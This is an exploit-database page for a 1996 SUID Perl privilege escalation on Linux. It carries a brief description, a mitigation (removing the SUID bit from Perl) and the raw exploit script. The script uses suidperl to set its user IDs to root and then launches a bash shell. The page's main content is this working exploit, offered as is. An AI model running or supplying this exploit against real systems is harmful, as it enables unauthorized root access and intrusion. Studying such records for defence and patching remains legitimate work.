header-logo
Suggest Exploit
vendor:
by:
Unknown
7.5
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
1996

SUID Perl Privilege Escalation

This exploit allows an attacker to escalate their privileges on a system by executing arbitrary commands with root privileges. By running a specially crafted Perl script with SUID permissions, the attacker can bypass normal permission checks and gain unauthorized access to system resources.

Mitigation:

To mitigate this vulnerability, it is recommended to remove the SUID permission from the Perl interpreter or any other potentially vulnerable scripts.
Source

Exploit-DB raw data:

#!/usr/bin/suidperl -U
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");


# milw0rm.com [1996-06-01]

Navigation

Suggest Exploit

Services By CQR